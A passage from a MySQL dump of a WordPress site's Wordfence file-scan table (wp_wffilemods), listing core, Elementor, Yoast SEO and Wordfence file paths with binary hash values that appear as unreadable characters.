('�I����+n��h^��','wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%l�)�&\r�-���','N�S4���רI����2�)^�Əri\0O�~��','',0,'?'),
('�Qa2�#��f}\\>�','wp-content/plugins/elementor-pro/modules/popup/display-settings/triggers.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/display-settings/triggers.php',0,'i�b�5�U�D�Y=\r','i�b�5�U�D�Y=\r','��z����m��E��x�\Z�8���mV��m��?','',0,'?'),
('�Y9g^�P�9��Ń!�','wp-content/plugins/elementor-pro/modules/loop-filter/data/interfaces/endpoint.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-filter/data/interfaces/endpoint.php',0,'a��Z.�,dUC�4#�','a��Z.�,dUC�4#�','��U��G�O�+�Fkj`�B��C�&��K���r','',0,'?'),
('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js','/var/www/html/ictbank/blog/wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC}��K���F��� j','w@���S¼|\r>��R�4�\n�N��3Ys�S��','',0,'?'),
('�n��̦z1��8:g�','wp-content/plugins/elementor/modules/system-info/templates/html.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/system-info/templates/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nܚֲd�%��k��','�#G��u�V�Ҳ*�H :6�E]t��P�|�','',0,'?'),
('�}m��RZ����','wp-content/plugins/elementor-pro/assets/js/nested-carousel.21c7f0c4423917225bce.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/nested-carousel.21c7f0c4423917225bce.bundle.min.js',0,'>\"e��\0���aK�K�','>\"e��\0���aK�K�','R�X����el�lӫd�\'wk7鿺e�>|@q@','',0,'?'),
('��,CUU����9i-','wp-includes/css/wp-auth-check.css','/var/www/html/ictbank/blog/wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^#���N�!�^D�',')�}��f�����aW`mH�ӵ�r)�K�Z��','',0,'?'),
('�����?� E�ռ�U','wp-content/plugins/wordpress-seo/images/link-out-icon.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/link-out-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)\"��&�S','��|���>�Ѳ��<���_]*[GXr�$��J','',0,'?'),
('�ȉV? ��]�)A','wp-includes/js/media-views.js','/var/www/html/ictbank/blog/wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!nK*�N�����','G$��)0��&d�����Kmw۪��^�!ez]�','',0,'?'),
('��Vk8������`�+','wp-includes/js/dist/development/react-refresh-entry.js','/var/www/html/ictbank/blog/wp-includes/js/dist/development/react-refresh-entry.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��l��_T,��','G\r�f����n���y���YE\0��yw�E�','',0,'?'),
('��`h�NkO�N8��','wp-includes/blocks/file/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q���\n�G&nO�R�','Ӳ���s������5��5؈�I�����x','',0,'?'),
('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php','/var/www/html/ictbank/blog/wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԃ�]6��Ow�� �','�P�n>�vZy�U>\Z\\���#�tp�ڿh�A','',0,'?'),
('��N�gZ[��ō�]W','wp-content/plugins/elementor-pro/assets/lib/html2canvas/js/html2canvas.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/lib/html2canvas/js/html2canvas.min.js',0,'tk@ũ��Ah�k���','tk@ũ��Ah�k���','�:H�� ��[8��)8%���5����~XO�6\\','',0,'?'),
('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���!\0�-�?*��L','�3���J�Ԅ3�kU�Pb�X���;9�)��','',0,'?'),
('����\'>�[��·�','wp-admin/js/user-profile.js','/var/www/html/ictbank/blog/wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�4��\Z~��T� ̥','����wi3�#@�l�����bB��`�M','',0,'?'),
('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.<$E�\0��g�:T�','ƝER%���f�\\�ɾ�\rv�8C�^�h','',0,'?'),
('���V���s���\0�','wp-content/plugins/wordfence/lib/wfIpLocation.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfIpLocation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s+�̙g��O;*XW','���jԚ�6��Ĕ- �B��1���&+�n','',0,'?'),
('����q�_���ġ��>','wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�7�������W��','gHn*O\Z��e��f<�u��^�vf�Vb�','',0,'?'),
('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css','/var/www/html/ictbank/blog/wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),
('�uWۓ�WP�^��(L�','wp-includes/blocks/post-navigation-link/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-navigation-link/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���vSi?\0�Â(��','�ŶC�ϭ�h���F0:2�I��v���\Z����T','',0,'?'),
('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),
('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php','/var/www/html/ictbank/blog/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���a�^��bR\\r','0��E�t���Z��[����Ĉ�iu�О���','',0,'?'),
('�>\'n0��U����','wp-content/plugins/elementor-pro/modules/mega-menu/traits/url-helper-trait.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/mega-menu/traits/url-helper-trait.php',0,'Ոq���\'>���R�','Ոq���\'>���R�','v#�ե�\\\r\"�)|��Q��Z,���r��!6n�','',0,'?'),
('��\\�(��wB��I�','wp-admin/network/update.php','/var/www/html/ictbank/blog/wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�� ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),
('�\"�OM��\0B�ٲ:�','wp-content/plugins/elementor/core/page-assets/loader.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/page-assets/loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3��\r���I�\"��7&B','-j�\Z��*gX�ղ\\��w�������DZ�','',0,'?'),
('�&�y�qG���~\r�','wp-content/plugins/elementor-pro/modules/query-control/controls/query.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/query-control/controls/query.php',0,'��Όw������k5\"�','��Όw������k5\"�','�d�ݨ�E�f�UB+���j�v��2��csV�','',0,'?'),
('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),
('�/ �E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),
('�7Vx˳r:��N&t�','wp-content/plugins/elementor-pro/assets/js/packages/editor-notes/editor-notes.asset.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/packages/editor-notes/editor-notes.asset.php',0,'p_��\Z弨���mZ��','p_��\Z弨���mZ��','c�<�C��WQ��V!p�[������)�\'�)','',0,'?'),
('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js','/var/www/html/ictbank/blog/wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�np��$����|��','�pv�v0���u����TRt.�s�t�-','',0,'?'),
('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),
('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js','/var/www/html/ictbank/blog/wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ychx*{əd��W��','�A��5�S(��|����GF��K��E��~','',0,'?'),
('�MȮs����%}�+=�','wp-includes/blocks/latest-posts/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/latest-posts/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��4�;eu<%��','��K�&\'���_MiU�\\#q3Qh�Y;c�F','',0,'?'),
('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),
('�Y��ػ�甩���*�','wp-includes/css/dist/edit-post/classic-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/edit-post/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�/o��u9�ğ\'�','�(��l����F�Σ��E�\\��WB��=�3���','',0,'?'),
('�`|y���� �I�hv3','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��t�)]t2M3|��q','Gzh�����Ƅ\\��l�𗊑��̀!�','',0,'?'),
('�l���;��$�� \n�','wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r\\gV�ڀڄ�n��','�hs���|����ݣG`4�rՄm�c� �','',0,'?'),
('�m�i\Zt�T��(_�\rp�','wp-content/plugins/wordpress-seo/js/dist/block-editor.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q\nJ˷H�a5t�','!�r��ò5f�!�T���+�ޖNN�&�9','',0,'?'),
('�oR�S�I\rV�ʽƘe�','wp-content/plugins/elementor/includes/api.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����TAv���W','3���������^kP���}P��x��','',0,'?'),
('�p)�T\Z35�������','wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0T��U���Ԛ� ݏ','���x�U�Y�pժ\n�\\�@t���t1T��P','',0,'?'),
('�w��5���)���','wp-includes/css/wp-embed-template-ie.css','/var/www/html/ictbank/blog/wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6�� ؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),
('������\r�l��;E','wp-content/plugins/elementor/assets/css/templates/widget-toggle-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/templates/widget-toggle-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�&gB���:o��',']�� �M�X���S/���L�=� ~�0ٙ&\\�֑','',0,'?'),
('���\"p�\Z��xx� ','wp-content/uploads/2022/12/haproxy-300x300.png','/var/www/html/ictbank/blog/wp-content/uploads/2022/12/haproxy-300x300.png',0,'/K[v�2��b�\\��','/K[v�2��b�\\��','\'�y��D��(��w�1�A�%2��(O��H\r/\0�I�','',0,'?'),
('��\0���+OW+�','index.php','/var/www/html/ictbank/blog/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),
('����.M2���\\�','wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԵO,��5�wV�L','�\Z�7�E@����^���Ŏl�.\0#��','',0,'?'),
('�����A���1\Z�;�','wp-includes/rss.php','/var/www/html/ictbank/blog/wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@�ci\'8] e͋','�ԋ��qӒ�W���PwQ���N�k��k(��','',0,'?'),
('���V�=� \"]��\Z�','wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��!��k�S���Y','b0�����},?�/�����Q�&��N�o','',0,'?'),
('�¶B�&��h&��a�$','wp-content/plugins/elementor/app/modules/import-export/runners/export/export-runner-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/export/export-runner-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\\@ny�����N�y','���o���2?�����;ĈD�O����J�Ws','',0,'?'),
('��1�4�R�����','wp-content/plugins/elementor/assets/shapes/split-negative.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/shapes/split-negative.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���H�C@/�)�','�=$c(^���5�C��#����L2�z����','',0,'?'),
('��{��h���B-o:Ih�','wp-includes/blocks/query-pagination-numbers/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/query-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@E�(1�˱�e��B�','O;\nV��[%��\Z3����Eh�d�x�:�{�','',0,'?'),
('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*Yq#Ӈ�w�A)��','����>�8q�`��7a\"v*�G�<�H�t�','',0,'?'),
('��gG�� Z��Ht��','wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/click.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/click.svg',0,'����¦��M���{i','����¦��M���{i','�(s�����T�{SgXH\n<�,���~=����','',0,'?'),
('�A����/�G�+�','wp-content/plugins/elementor-pro/assets/js/nested-carousel-editor.6337dab68af203be7c04.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/nested-carousel-editor.6337dab68af203be7c04.bundle.min.js',0,'4]8����9̤�>\0��','4]8����9̤�>\0��','�,���!�r���<y�׀O�M�q��}��','',0,'?'),
('��]ނ�ִ�&iU','wp-content/plugins/elementor-pro/modules/dynamic-tags/acf/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/dynamic-tags/acf/module.php',0,'��`����Tü�Ly�','��`����Tü�Ly�',']J�)�a��&=k8��\"��_�q��?T*=','',0,'?'),
('�$�j��<�9~/q','wp-content/plugins/elementor/assets/js/e-home-screen.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/e-home-screen.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\Z!�&+fQs��:f','�$s�f�|B-���w�+�ci�gT�������','',0,'?'),
('� \\)]���8@s)��','wp-content/uploads/2021/05/Slide01-100x100.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Slide01-100x100.jpg',0,';���Ȩ$��d�ڪ',';���Ȩ$��d�ڪ','��Nw��i)���\nxR�ݶ$����K^XI�','',0,'?'),
('�$���EGm�mO�|�','wp-content/plugins/elementor/modules/image-loading-optimization/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/image-loading-optimization/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0����v��F�\r�','����iJ�:ܪˏN��f�����m��!�W�','',0,'?'),
('�4mo~\"f��h��1��4','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jx��H�?h�b�`�sy','z�ϕ�j�D6Ĥ��NR�Y�,[VM2�VX���=�','',0,'?'),
('�7[j�=LcBr�ro9','wp-content/plugins/elementor/modules/shapes/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/shapes/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̾�P�>��=���?','To���N��͋xE��v�[��&���r ��v�','',0,'?'),
('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),
('�W�nJ�.\'/x��','wp-includes/blocks/embed/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/embed/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�M0AW+{�-�W','�������Q=1��2��g6�0��j�0','',0,'?'),
('�h��\'��h��Q�{9`','wp-includes/Requests/src/Exception/Http/Status401.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Exception/Http/Status401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�uM��6/�R\\�','�9`�s�-K���GH�ے�w3��7�� ��','',0,'?'),
('�s��9��(S*n�9�{','wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.js',0,'�O�>�Hߟ�M��#','�O�>�Hߟ�M��#','�8���>B$�G}�2�}�a.��Jh�t�7�','',0,'?'),
('�{K�Ǎ�:R�,$1��','wp-content/plugins/elementor/core/settings/base/css-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/settings/base/css-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������:Ȑ�]�c','�/�\\��PS�|!7YӞ���l��Kbܵ@�','',0,'?'),
('���|�W�?�o:��3E','wp-content/plugins/elementor-pro/assets/css/widget-off-canvas-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-off-canvas-rtl.min.css',0,'���I\\���`�,�S','���I\\���`�,�S','d�F�>����~�}ȧi�\\��g���e�w���\Z','',0,'?'),
('��oVu�4���;f��','wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d����uI��(��Y��','�\\Ou�ip\'(y]�� ���+�\nZ���<}��','',0,'?'),
('����W�kV������','wp-includes/blocks/comments-title.php','/var/www/html/ictbank/blog/wp-includes/blocks/comments-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@R���xᛱH���','��/e�A[\'�\\�o=o*�d��E@˛�0�','',0,'?'),
('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),
('�����LKkLA���Y�','wp-content/plugins/wordpress-seo/src/user-meta/application/cleanup-service.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/user-meta/application/cleanup-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�aD��e�2�gϞ~�P','ȱ��ȉ]\Z\ZN�bu\\�\0nD�)R�,˙�}&�','',0,'?'),
('�и+:3�XnN�tex�X','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����{W�7h>���','� 2m��w��3�)zWg��v{Af��Hu`Co','',0,'?'),
('�����Ș � \0}�P','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�*2�*ZY.�?�8�','LOo�Mٸz�ӫ7!���*����s�-���&','',0,'?'),
('���ʆ��n�D㮖�(','wp-admin/css/install.min.css','/var/www/html/ictbank/blog/wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��伴(���jO=5n�','p���>�m`\"N���8zV��\\�)E�n�.R��f�','',0,'?'),
('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�����؎�S�-','���R�@@�lQ�F܃\'(m��^znwnxq�O�[','',0,'?'),
('��}�*�I��ҪD+.','wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʑ���\n�;)�1ԛAw','�/ФvK��T��%��9�q��3��','',0,'?'),
('�K��SE�ō�L�3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V=����r�@ٸ~kt�','|�J\0�R]-�2����3z���T����H?�U��','',0,'?');
INSERT INTO `wp_wffilemods` VALUES
('����S�~�K�ʌS','wp-content/plugins/elementor/modules/wp-cli/library.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/wp-cli/library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8bfwCr�|]g^�N�f','�].=���:�=KMk�l��\\�ق�I\n','',0,'?'),
('���R!72�\'�\ZT��\Z','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCoreDefault.css','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCoreDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�_ҟp�X�@�Мܤ','�q�wn��&n���8��G���\0','',0,'?'),
('�)ũ��2[� �4�_a','wp-includes/class-walker-category-dropdown.php','/var/www/html/ictbank/blog/wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ԃ�IV�*��t�','�Iw�^���KHĶ\\�s��~BW��㺾fI','',0,'?'),
('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php','/var/www/html/ictbank/blog/wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gu�l�4�g�V�','bi\0�cH6�;�`B4/>0��R� %�/U(','',0,'?'),
('�:+[��g��CZ���','wp-includes/template-loader.php','/var/www/html/ictbank/blog/wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z� ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),
('�=�[���d����','wp-content/plugins/elementor/assets/js/container.a7f0a15dfa05df34e1f7.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/container.a7f0a15dfa05df34e1f7.bundle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ə�2j��;%��_ssn','H���?�ə8�e|�x�@;����e:SeU�fUN','',0,'?'),
('�H Ɩ86���In�','wp-content/plugins/wordpress-seo/src/loadable-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/loadable-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\;��T��U�*��@l;','�c��Ԥ\Zh��EA�2�f�ԾI��Ɲ�x�-','',0,'?'),
('�Ji)#�k ͷoJ�','wp-content/plugins/elementor-pro/modules/dynamic-tags/toolset/tags/toolset-text.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/dynamic-tags/toolset/tags/toolset-text.php',0,'�i�j0� �Y:^�{�','�i�j0� �Y:^�{�','(��BO���d���7?�h���I=pǝ֒[�','',0,'?'),
('�Y��r~Ҁ��:��$�!','wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[{7DYhЧ�m�f}�\rf','�\n��?\ra���ؐAL:, ={L�5}��+,��','',0,'?'),
('�_I���͵٩ep�','wp-content/plugins/elementor/core/base/background-task-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/base/background-task-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gO�4�s殚����&w','�D��w*HBT�H�)��S�}���ȁ','',0,'?'),
('�i2O���+�s�X.�','wp-includes/js/jquery/ui/core.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��2�Yfg��p�','?U�7��Dosz���X-҂�b|�\Z�����','',0,'?'),
('�k����\n�����h','wp-content/themes/twentytwentyfour/patterns/hidden-search.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/hidden-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�{��{*�L�Ixx�','G�^I5��]8��P]F�)� ��,�����`g ','',0,'?'),
('�����b]�ٺ=�0_','wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MU�{�)����O�','QVQ�bK_���Ύ�Rƕ�]�-�mlY��<9iqV','',0,'?'),
('��@<N�8iy�����','wp-includes/blocks/separator/theme-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/separator/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EO�c���m��{��','�/`i-^�3җ;�B��T�;����#\0�r�}:j','',0,'?'),
